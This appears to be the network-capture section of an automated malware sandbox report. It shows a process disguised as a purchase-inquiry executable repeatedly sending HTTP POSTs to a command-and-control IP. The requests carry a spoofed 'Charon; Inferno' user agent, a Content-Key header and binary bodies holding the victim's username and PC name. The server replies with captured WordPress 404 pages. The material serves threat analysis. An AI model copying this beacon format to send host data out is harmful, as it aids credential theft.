                  May 27, 2024 08:33:07.441947937 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:07.441976070 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:07.442157984 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:07.442240000 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.44976845.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:07.940840960 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:07.945858002 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:10.080249071 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:08 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:10.080281019 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:10.080312967 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:10.080327034 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:10.080354929 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:10.080375910 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                  Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                  May 27, 2024 08:33:10.080399036 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                  Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                  May 27, 2024 08:33:10.080414057 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                  Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                  May 27, 2024 08:33:10.080445051 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                  May 27, 2024 08:33:10.080476046 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.44976945.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:10.404395103 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:10.410917997 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:12.489229918 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:10 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:12.489263058 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:12.489288092 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:12.489308119 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:12.489330053 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:12.489356995 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:12.489381075 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:12.489403009 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:12.489427090 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:12.489447117 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.44977045.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:12.641160011 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:12.646167994 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:14.786736012 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:13 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:14.786771059 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:14.786796093 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:14.786818981 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:14.786834955 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
